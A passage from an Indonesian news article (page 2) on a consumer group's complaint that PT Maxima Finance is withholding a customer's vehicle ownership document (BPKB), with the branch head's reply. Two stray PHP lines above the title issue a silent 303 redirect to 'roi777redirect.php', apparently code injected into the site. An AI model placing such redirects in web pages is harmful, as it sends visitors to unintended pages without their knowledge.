header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Konsumen Keluhkan Leasing PT Maxima Finance Karena Mengambil BPKB Lama - Page 2 of 2 -
Konsumen Keluhkan Leasing PT Maxima Finance Karena Mengambil BPKB Lama

Pihaknya pun selaku organisasi perlindungaan konsumen, mengancam akan meneruskan masalah dugaan penggelapan BPKB  konsumen  ke proses hukum yang berlaku apabila mangkir sampai pemanggilan ketiga. “Saat ini kita sudah pemanggilan pertama, namun liat saja, pihak PT Maxmima tidak datang,  Kita akan melayangkan surat pemanggilan kedua ke PT. Maxima Finance, apabila mereka tidak datang,  terpaksa kita membuat laporan tertulis ke polresta Bandar Lampung guna menindaklanjuti proses hukum dugaan penggelapan STNK,” kata Fauzi .

Menurutnya, Tamami, adik dari Zakaria melaporkan PT Maxima Finance yang beralamatkan di jalan Gajah Mada, Antasari, Bandar Lampung pada 4 Mei 2016 ke BPSK Bandar Lampung. Kemudian, lanjut dia, pihaknya mulai menindaklanjuti masalah pengaduan ini pada 10 Mei 2016 kemarin dengan menyurati PT. Maxima Finance guna menyelesaikan masalah ini. Dilain sisi, pihaknya juga menerima pengaduan dari masyarakat apabila ada lising yang mengambil kendaraan konsumen saat berada ditengah jalan, itu namanya perampokan. Karena, secara Hukum itu merupakan ranah pengadilan yang melakukan sita ataupun pengosongan, bukan lising. “Penarikan yang benar itu secara substitusi dengan mengambil kendaraan tersebut secara baik-baik dirumah dengan disaksikan dari pihak kepolisian, pimpinan lising yang disertai dengan Surat Penarikan Kendaraan (SPK),” ungkapnya.

Terpisah, Kepala cabang Lampung PT Maxmima  Finance , Faisal menyatakan, pihaknya tidak ada maksut untuk menggelapkan BPKB konsumen, namun sampai saat ini BPKB tersebut masih berada di jakarta untuk di proses. “Saat ini masih dalam tahap proses, jadi kami minta konsumen bersabar,”kata dia saat dihubungi melalui telepon. Faisal menayakan, pihaknya berjanji akan memberikan BPKB tersebut pada hari senin (16/5).
“Kami akan serahkan BPKB nya pada hari senin, jadi saya minta bersabar saja,” ucapnya. (jefri)

Pages: 1 2
News Reporter

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.